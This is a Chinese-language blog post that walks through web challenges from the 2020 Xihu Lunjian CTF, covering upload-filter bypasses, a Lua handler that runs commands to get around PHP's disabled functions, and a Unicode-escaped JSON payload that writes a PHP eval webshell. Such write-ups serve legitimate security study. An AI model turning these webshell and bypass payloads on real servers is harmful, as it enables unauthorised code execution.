<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    
    <title>
        2020西湖论剑-web复现 | Ma4out7&#39;Blog
    </title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
        <link rel="shortcut icon" href="/images/avatar.jpg">
    
    
<link rel="stylesheet" href="/css/style.css">

    <script id="hexo-configurations">
    let CONFIG = {"hostname":"example.com","root":"/","localsearch":{"enable":true,"trigger":"auto","unescape":false,"preload":false},"themeInfo":{"name":"ILS","version":"2.0.2","author":"XPoet","repository":"https://github.com/XPoet/hexo-theme-ils"}};
  </script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
<div class="page-container">

    <header class="page-header">
        <div class="header-progress"></div>
    </header>

    <main class="page-main">

        <div class="page-main-content">

            <div class="page-main-content-top">
                <header class="header-wrapper">

    <div class="header-content">

        <a class="logo-title" href="/">
            Ma4out7&#39;Blog
        </a>

        <ul class="menu-list">
            
                <li class="menu-item">
                    <a class=""
                       href="/"
                    >
                        首页
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/archives"
                    >
                        归档
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/categories"
                    >
                        分类
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/tags"
                    >
                        标签
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/links"
                    >
                        友链
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/about"
                    >
                        关于
                    </a>
                </li>
            
        </ul>

        <div class="menu-bar">
            <div class="menu-bar-middle"></div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


            </div>

            <div class="page-main-content-middle">

                <main class="main-content normal-code-theme">

                    
                        <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <h3><a class="title-hover-animation">2020西湖论剑-web复现</a></h3>
        </div>

        <div class="meta-info">
            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa fa-calendar-o"></i> 2021-04-02 16:06:06
    </span>
    
        <span class="article-categories article-meta-item">
            <i class="fa fa-folder"></i>
            <ul>
                
                    <li>
                        <a href="/categories/CTF%E6%AF%94%E8%B5%9B/">CTF比赛</a>
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa fa-tags"></i>
            <ul>
                
                    <li>
                        <a href="/tags/CTF%E6%AF%94%E8%B5%9B/">CTF比赛</a>
                    </li>
                
            </ul>
        </span>
    
    
    
    
</div>

        </div>

        <div class="article-content markdown-body">
            <h2 id="2020-西湖论剑"><a href="#2020-西湖论剑" class="headerlink" title="2020 西湖论剑"></a>2020 西湖论剑</h2><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>记得当时第一次参加比赛，虐的好惨，题目很好，网速很快，就是做不出，全程凑数，新手村的我刚出门就直接面对百级 boss，没有任何游戏体验。重新开始，今年继续</p>
<h3 id="1-NewUload"><a href="#1-NewUload" class="headerlink" title="1.NewUload"></a>1.NewUload</h3><p><img src="https://img-log.csdnimg.cn/img_convert/69458210dda3f04cb0bab6cc314be43a.png"></p>
<ul>
<li><p>文件上传，过滤了文件后缀名和文件内容都过滤了 php 关键字，甚至短标签的尖括号都不行，但是，没想到居然可以通过换行来绕过后缀名检测和用图片马来绕过文件内容的检测。<br><img src="https://img-blog.csdnimg.cn/20201013194700704.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1RNXzEwMjQ=,size_16,color_FFFFFF,t_70#pic_center"></p>
</li>
<li><p>就能从 phpinfo 中发现 disable_functions 中禁用了很多函数。网上有两种方法</p>
</li>
<li><p>第一种就是利用.htaccess+lua。lua 是也是一种轻量化脚本语言，在 PHP 环境中可以被解析</p>
<ul>
<li>先上传一个.htaccess 文件，作用是使 lua 文件解析生效。</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">.htacces</span><br><span class="line">AddHandler lua-script .lua</span><br></pre></td></tr></table></figure>

<ul>
<li>然后上传一个 1.lua 文件，再访问 1.lua 就能成功得到 flag。</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">--[<span class="number">1.</span>lua --]</span><br><span class="line"></span><br><span class="line"><span class="keyword">require</span> <span class="string">&quot;string&quot;</span></span><br><span class="line"></span><br><span class="line">--[[</span><br><span class="line">    This is the <span class="keyword">default</span> method name <span class="keyword">for</span> Lua handlers, see the optional</span><br><span class="line">    <span class="function"><span class="keyword">function</span>-<span class="title">name</span> <span class="title">in</span> <span class="title">the</span> <span class="title">LuaMapHandler</span> <span class="title">directive</span> <span class="title">to</span> <span class="title">choose</span> <span class="title">a</span> <span class="title">different</span></span></span><br><span class="line"><span class="function">    <span class="title">entry</span> <span class="title">point</span>.</span></span><br><span class="line"><span class="function">--]]</span></span><br><span class="line"><span class="function"><span class="title">function</span> <span class="title">handle</span>(<span class="params">r</span>)</span></span><br><span class="line"><span class="function">    <span class="title">r</span>.<span class="title">content_type</span> = &quot;<span class="title">text</span>/<span class="title">plain</span>&quot;</span></span><br><span class="line"><span class="function">    <span class="title">r</span>:<span class="title">puts</span>(<span class="params"><span class="string">&quot;Hello Lua World!\n&quot;</span></span>)</span></span><br><span class="line"><span class="function">    <span class="title">local</span> <span class="title">t</span> = <span class="title">io</span>.<span class="title">popen</span>(<span class="params"><span class="string">&#x27;/readflag&#x27;</span></span>)</span></span><br><span class="line"><span class="function">    <span class="title">local</span> <span class="title">a</span> = <span class="title">t</span>:<span class="title">read</span>(<span class="params"><span class="string">&quot;*all&quot;</span></span>)</span></span><br><span class="line"><span class="function">    <span class="title">r</span>:<span class="title">puts</span>(<span class="params">a</span>)</span></span><br><span class="line"><span class="function">    <span class="title">if</span> <span class="title">r</span>.<span class="title">method</span> == &#x27;<span class="title">GET</span>&#x27; <span class="title">then</span></span></span><br><span class="line"><span class="function">        <span class="title">for</span> <span class="title">k</span>, <span class="title">v</span> <span class="title">in</span> <span class="title">pairs</span>(<span class="params"> r:parseargs(<span class="params"></span>) </span>) <span class="title">do</span></span></span><br><span class="line"><span class="function">            <span class="title">r</span>:<span class="title">puts</span>(<span class="params"> <span class="keyword">string</span>.format(<span class="params"><span class="string">&quot;%s: %s\n&quot;</span>, k, v</span>) </span>)</span></span><br><span class="line"><span class="function">        <span class="title">end</span></span></span><br><span class="line"><span class="function">    <span class="title">else</span></span></span><br><span class="line"><span class="function">        <span class="title">r</span>:<span class="title">puts</span>(<span class="params"><span class="string">&quot;Unsupported HTTP method &quot;</span> .. r.method</span>)</span></span><br><span class="line"><span class="function">    <span class="title">end</span></span></span><br><span class="line"><span class="function"><span class="title">end</span></span></span><br></pre></td></tr></table></figure>
</li>
</ul>
<ul>
<li><p>第二种方法是弹 shell，但是方法很复杂，有点难懂，参考<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650485991&idx=4&sn=3c29dd773b2b91b9a1668c2d393fc1d3&chksm=83ba5103b4cdd815d343344143771da432a5957d8527b773c499ec0eea480973b3e6d2606838&scene=21#wechat_redirect">大佬文章</a></p>
<blockquote>
<p>参考<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/tm_1024/article/details/109056127">https://blog.csdn.net/tm_1024/article/details/109056127</a></p>
</blockquote>
</li>
</ul>
<h3 id="2-EasyJson"><a href="#2-EasyJson" class="headerlink" title="2.EasyJson"></a>2.EasyJson</h3><ul>
<li>这题总的来说就是代码审计+（伪）文件上传+RCE,</li>
<li>主要考点就是绕过 json 格式</li>
<li>源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;security.php&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">&#x27;source&#x27;</span>]))&#123;</span><br><span class="line">    show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="keyword">die</span>();</span><br><span class="line">&#125;</span><br><span class="line">$sandbox = <span class="string">&#x27;sandbox/&#x27;</span>.sha1($_SERVER[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>]).<span class="string">&#x27;/&#x27;</span>;<span class="comment">//设置沙盒根据自己ip获得目录</span></span><br><span class="line">var_dump($sandbox);</span><br><span class="line"><span class="keyword">if</span>(!file_exists($sandbox))&#123;<span class="comment">//如果不存在就创建</span></span><br><span class="line">    mkdir($sandbox);</span><br><span class="line">    file_put_contents($sandbox.<span class="string">&quot;index.php&quot;</span>,<span class="string">&quot;&lt;?php echo &#x27;Welcome To Dbapp OSS.&#x27;;?&gt;&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line">$action = $_GET[<span class="string">&#x27;action&#x27;</span>];</span><br><span class="line">$content = file_get_contents(<span class="string">&quot;php://input&quot;</span>);<span class="comment">//获得post数据流</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($action == <span class="string">&quot;write&quot;</span> &amp;&amp;  SecurityCheck(<span class="string">&#x27;filename&#x27;</span>,$_GET[<span class="string">&#x27;filename&#x27;</span>]) &amp;&amp;SecurityCheck(<span class="string">&#x27;content&#x27;</span>,$content))&#123;<span class="comment">//验证函数</span></span><br><span class="line">    $content = json_decode($content);<span class="comment">//json格式解密</span></span><br><span class="line">    $filename = $_GET[<span class="string">&#x27;filename&#x27;</span>];</span><br><span class="line">    $filecontent = $content-&gt;content;<span class="comment">//获得content变量的值</span></span><br><span class="line">    $filename = $sandbox.$filename;</span><br><span class="line">    file_put_contents($filename,$filecontent.<span class="string">&quot;\n Powered By Dbapp OSS.&quot;</span>);<span class="comment">//写入文件，利用点</span></span><br><span class="line">&#125;<span class="keyword">elseif</span>($action == <span class="string">&quot;reset&quot;</span>)&#123;<span class="comment">//删除操作</span></span><br><span class="line">    $files = scandir($sandbox);</span><br><span class="line">    <span class="keyword">foreach</span>($files <span class="keyword">as</span> $file) &#123;</span><br><span class="line">        <span class="keyword">if</span>(!is_dir($file))&#123;</span><br><span class="line">            <span class="keyword">if</span>($file !== <span class="string">&quot;index.php&quot;</span>)&#123;</span><br><span class="line">                unlink($sandbox.$file);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;Security Check Failed.&#x27;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>get 要传入 action,filename 和 source 这三个参数。source 是保证下面的 php 命令可以执行，action 是我们要执行的操作，肯定是 write 了。filename 是我们要写的文件的名字。<br>post 要传入 json 格式的参数，它的 content 键的值是我们要写入文件的内容。<br>审清楚这些，应该做的就是写一个可以 RCE 的文件，因为我们写的文件的目录已知，文件名已知，然后再读取那个文件，用蚁剑连或者进行 RCE。</p>
<p>第一个绕过点是文件名。因为习惯性给文件命名 1.php，在这里直接没通过那个安全检测了。我一开始以为是后缀 php 被过滤，后来我把后缀去掉发现还是被阻了，然后我把文件改成了 feng.php 就好了，才发现只有字母给文件命名才行。<br>接下来就是 post 传入的参数了。post 传入后赋给变量$content，但是$content 要被 json_decode 一次。我一开始尝试这样写<code>&#123;&quot;content&quot;:&quot;&lt;?php eval($_GET[&#39;a&#39;]);?&gt;&quot;&#125;</code>,发现爆 check fail。我尝试了大小写双写绕过后还是不行，然后就卡住了。。因为真的对 json 这个内容不太了解。</p>
<p>看了 WP，原来 content 里的 on 也被过滤了。这是我没想到的。怎么绕过呢？尝试用 unicode 编码来绕过。原理可以参考下面文章：<br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/306">浅谈 json 参数解析对 waf 绕过的影响</a></p>
<ul>
<li>被过滤的全部使用 Unicode 编码之后即可，<code>&#123;&quot;\u0063\u006f\u006e\u0074\u0065\u006e\u0074&quot;:&quot;&lt;?\u0070\u0068\u0070 eval($_GET[&#39;a&#39;]);?&gt;&quot;&#125;</code><br>再访问一下<a target="_blank" rel="noopener" href="http://easyjson.xhlj.wetolink.com/sandbox/9beb98a8de69744aec8456acc562a3685f92fabd/feng.php">http://easyjson.xhlj.wetolink.com/sandbox/9beb98a8de69744aec8456acc562a3685f92fabd/feng.php</a><br>然后进行 RCE。通过查看 phpinfo，可以发现这题没有任何函数被禁用，因此获取 flag 就十分容易了。<br>找到 security.php 的源码</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Created by PhpStorm.</span></span><br><span class="line"><span class="comment"> * User: meizj</span></span><br><span class="line"><span class="comment"> * Date: 2020/2/7</span></span><br><span class="line"><span class="comment"> * Time: 1:31 PM</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">SecurityCheck</span>(<span class="params">$type,$content</span>)</span>&#123;</span><br><span class="line">    <span class="keyword">switch</span> ($type)&#123;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;filename&#x27;</span>:</span><br><span class="line">            <span class="keyword">if</span>(preg_match(<span class="string">&quot;/[^a-z\.]/&quot;</span>, $content) !== <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="string">&#x27;content&#x27;</span>:</span><br><span class="line">            <span class="keyword">if</span>(stristr($content,<span class="string">&#x27;on&#x27;</span>) || stristr($content,<span class="string">&#x27;html&#x27;</span>) || stristr($content,<span class="string">&#x27;type&#x27;</span>) || stristr($content,<span class="string">&#x27;flag&#x27;</span>) || stristr($content,<span class="string">&#x27;upload&#x27;</span>) || stristr($content,<span class="string">&#x27;file&#x27;</span>) || stristr($content,<span class="string">&#x27;php&#x27;</span>)  || stristr($content,<span class="string">&#x27;.&#x27;</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>文件名只能 a-z 的字母，对于 post 的参数，则过滤了 on,html,type,flag,upload,file,php 和.</p>
<blockquote>
<p>参考<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/rfrder/article/details/109107736">https://blog.csdn.net/rfrder/article/details/109107736</a>?<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_46091464/article/details/108967312">https://blog.csdn.net/qq_46091464/article/details/108967312</a>?</p>
</blockquote>
<h3 id="3-HardXss"><a href="#3-HardXss" class="headerlink" title="3.HardXss"></a>3.HardXss</h3><p>这题考的是 ServiceWorker，</p>
<blockquote>
<p>简单的讲，是浏览器在后台独立于网页运行的脚本。可以简单的认为是一个介于客户端和服务端之间的代理服务器，最重要的作用之一就是缓存离线资源。</p>
</blockquote>
<blockquote>
<p>SW 提供了一组 API，能够拦截当前站点产生 HTTP 请求，还能控制返回结果。因此，SW 拦住请求后，使用 Cache Storage 里的内容进行返回，就可以实现离线缓存的功能。当 Cache Storage 不存在请求的资源时再向服务器请求,cache.put 可以选择性地将请求资源加载到 cache storage 中。如果不手动取消已经注册过的 sw 服务,刷新/重新打开页面都会启动站点的 sw 服务，这为我们持久化 XSS 提供了一定的条件。</p>
</blockquote>
<ul>
<li>已经找不到 writeup 了….那就这样吧。😅🤓</li>
</ul>

        </div>

        <div class="article-nav">
            
                <div class="article-prev">
                    <a class="prev btn"
                       rel="prev"
                       href="/2021/04/06/CTF%E6%AF%94%E8%B5%9B/DASctf/"
                    >
                        <i class="fa fa-chevron-left"></i> <span class="post-nav-title-item">DASctf-web 复现</span><span class="post-nav-item">上一篇</span>
                    </a>
                </div>
            
            
                <div class="article-next">
                    <a class="next btn"
                       rel="next"
                       href="/2021/03/28/upload-labs/upload-labs/"
                    >
                        <span class="post-nav-title-item">upload-labs靶机练习</span><span class="post-nav-item">下一篇</span> <i class="fa fa-chevron-right"></i>
                    </a>
                </div>
            
        </div>

        <div class="comment-container">
            <div class="comments-container">
    
        

    
</div>
        </div>
    </div>
</div>


                    

                </main>

            </div>

            <div class="page-main-content-bottom">
                <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy; 2021 <i class="fa fa-heart-o"></i> <a href="/">Ma4out7</a>
        </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动 | 主题 <a
                    href="https://github.com/XPoet/hexo-theme-ils" target="_blank">ILS v2.0.2</a>
        </div>
    </div>
</footer>

            </div>
        </div>
    </main>

    <div class="sidebar-tools">
        <div class="tools-container">
    <ul class="tools-list">
        
            <li class="search popup-trigger">
                <i class="fa fa-search"></i>
            </li>
            
<script src="/js/local-search.js"></script>

        
        <li class="mode-toggle">
            <i class="fa fa-moon-o"></i>
        </li>
        
        <li class="page-aside-toggle">
            <i class="fa fa-bars"></i>
        </li>
        
            <li class="scroll-to-top">
                <i class="fa fa-caret-up"></i>
            </li>
        
    </ul>
</div>

    </div>

    <!-- page aside -->
    <aside class="page-aside">
        
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#2020-%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91"><span class="nav-number">1.</span> <span class="nav-text">2020 西湖论剑</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-NewUload"><span class="nav-number">1.2.</span> <span class="nav-text">1.NewUload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-EasyJson"><span class="nav-number">1.3.</span> <span class="nav-text">2.EasyJson</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-HardXss"><span class="nav-number">1.4.</span> <span class="nav-text">3.HardXss</span></a></li></ol></li></ol>
    </div>
</div>
        
    </aside>

</div>



    <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-icon">
            <i class="fa fa-search"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fa fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>



<script src="/js/main.js"></script>
<script src="/js/header-shrink.js"></script>
<script src="/js/toggle-mode.js"></script>



    
<script src="/js/scroll-to-top.js"></script>





    
        
<script src="/js/code-copy.js"></script>

    

    
        
<script src="/lib/anime.min.js"></script>
<script src="/js/toc.js"></script>
<script src="/js/post-toc.js"></script>

    



</body>
</html>